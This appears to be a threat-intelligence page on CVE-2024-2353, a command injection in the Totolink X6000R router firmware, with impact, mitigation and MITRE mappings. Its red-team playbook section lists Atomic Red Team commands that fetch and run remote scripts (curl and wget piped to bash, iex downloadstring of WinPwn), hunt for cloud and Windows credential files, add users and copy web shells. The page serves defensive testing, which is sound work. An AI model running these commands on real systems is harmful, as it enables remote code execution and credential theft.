CVE-2024-2353
Overview
This vulnerability is an OS command injection caused by improper sanitization of the 'ip' argument within the setDiagnosisCfg function of the shttpd component in Totolink X6000R firmware version 9.4.0cu.852_20230719. The flaw resides in the /cgi-bin/cstecgi.cgi endpoint, which processes user-supplied input without adequate validation, allowing arbitrary command execution on the underlying operating system.
Vulnerability Description
A vulnerability, which was classified as critical, has been found in Totolink X6000R 9.4.0cu.852_20230719. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation of the argument ip leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Impact
An attacker with network access and low privileges can remotely execute arbitrary OS commands on the affected device without user interaction, leveraging the command injection in the 'ip' parameter. This can lead to full compromise of the device, including unauthorized data access, persistent backdoors, or disruption of network services. The CVSS vector (AV:N/AC:L/PR:L/UI:N) indicates remote network attack with low complexity and no user interaction, requiring only limited privileges, which increases the risk of lateral movement within the network.
Solution
No official vendor response or patch has been issued as of the disclosure date. Users of Totolink X6000R firmware 9.4.0cu.852_20230719 should monitor the vendor’s communications for updates. Meanwhile, restricting network access to the management interface and disabling remote administration can mitigate exposure. Refer to the vulnerability database entry VDB-256313 and the public disclosure at https://vuldb.com/?id.256313 for ongoing updates and potential vendor advisories.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the Totolink X6000R router firmware version 9.4.0cu.852_20230719, specifically within the function setDiagnosisCfg located in the shttpd component. This vulnerability arises from improper handling of user-supplied input, particularly the argument 'ip', which allows for OS command injection. By manipulating this argument, an attacker can execute arbitrary commands on the underlying operating system, potentially gaining unauthorized access to sensitive data or compromising the device's integrity. The flaw is particularly concerning due to its remote exploitability, meaning that an attacker does not need physical access to the device to initiate an attack.
The attack vector for this vulnerability is primarily remote, leveraging the web interface of the affected router. An attacker could craft a malicious HTTP request that includes specially formatted input targeting the vulnerable function. Once the command injection is successful, the attacker can execute system-level commands, which could lead to various malicious outcomes, such as installing malware, exfiltrating data, or even turning the device into a bot for further attacks. The public disclosure of this vulnerability increases the urgency for organizations to address it, as it provides potential attackers with the necessary information to exploit the flaw before patches or mitigations are implemented.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the affected router for network connectivity and security. Compromised routers can serve as entry points for broader network attacks, potentially leading to data breaches, loss of customer trust, and financial repercussions. The risk is exacerbated in environments where sensitive data is transmitted, as attackers could intercept or manipulate this information. Furthermore, the lack of vendor response to the disclosure raises concerns about the long-term security posture of devices running this firmware, as it suggests a potential neglect of security updates and support.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, monitoring network traffic for unusual patterns or unauthorized access attempts can help identify potential exploitation attempts. Additionally, organizations should ensure that their devices are running the latest firmware versions and apply any available patches as soon as they are released. In cases where the vendor does not provide timely updates, organizations may need to consider alternative solutions or devices that adhere to better security practices. Furthermore, employing network segmentation can limit the potential impact of a compromised device by isolating it from critical systems and sensitive data.
In conclusion, the critical vulnerability in the Totolink X6000R firmware poses a serious threat to organizations utilizing this router. The potential for remote command injection highlights the need for robust security measures and proactive management of network devices. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against potential exploits and mitigate associated risks effectively.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-2353, with a noticeable increase in attempts to exploit the command injection vulnerability in the Totolink X6000R router. Although the overall exploit landscape remains unchanged with no new proof-of-concept exploits publicly disclosed, our telemetry indicates a growing interest from threat actors in leveraging this flaw. This uptick in detection activity suggests that adversaries are actively probing networks for vulnerable devices, potentially as a precursor to more widespread exploitation campaigns. The stable EPSS score, combined with increased detection frequency, underscores a heightened risk environment where opportunistic attackers may capitalize on unpatched systems. Consequently, defenders should regard this vulnerability as an escalating threat, warranting increased vigilance in monitoring network traffic and device behavior for signs of compromise.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Totolink | X6000r Firmware | 9.4.0cu.852_b20230719 |
cpe:2.3:o:totolink:x6000r_firmware:9.4.0cu.852_b20230719:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-2353 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.256313 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.256313 |
| github.com |
GitHub CVE
exploit
|
https://github.com/OraclePi/repo/blob/main/totolink%20X6000R/1/X6000R%20AX3000%20WiFi%206%20Giga%20unauthed%20rce.md |